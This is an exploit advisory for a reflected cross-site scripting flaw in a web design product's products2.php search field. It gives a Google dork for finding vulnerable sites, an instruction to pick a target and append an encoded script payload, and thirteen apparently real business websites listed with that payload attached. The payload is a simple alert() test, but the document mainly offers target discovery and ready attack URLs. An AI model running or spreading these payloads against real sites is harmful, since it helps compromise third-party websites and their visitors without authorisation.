|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: Web Design 事業通 Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://tw.sayato.com/
|[+]
|[+] Google Dork: intext:"Web Design 事業通" products2.php
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 24 01 2016
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork and choose a target and add "%3Cscript%3Ealert%28%29%3C%2Fscript%3E" after URL!
|[+] To see Vulnerability!
|--------------------------------------------------------------|
|[+] Examples :
|[+]
|[+] http://www.twdrybox.com/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
|[+]
|[+] http://www.hong-tai.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
|[+]
|[+] http://www.dry-cabinet.com.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
|[+]
|[+] http://organic-association.com/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%28%29%3C%2Fscript%3E
|[+]
|[+] http://www.yuji168.com.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|[+] http://xin-huang.com.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|[+] http://www.svetlo.com.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|[+] http://www.pinpoint.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|[+] http://www.e-tung.com.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|[+] http://www.ao-outdoor.com.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|[+] http://www.opto-in.com/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|[+] http://www.chifont.com.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|[+] http://www.ncc88.com.tw/products2.php?submit=GO&sarch_pd=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : modiret
|[+] tnQ : Mahdi.Hidden , Ac!D
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|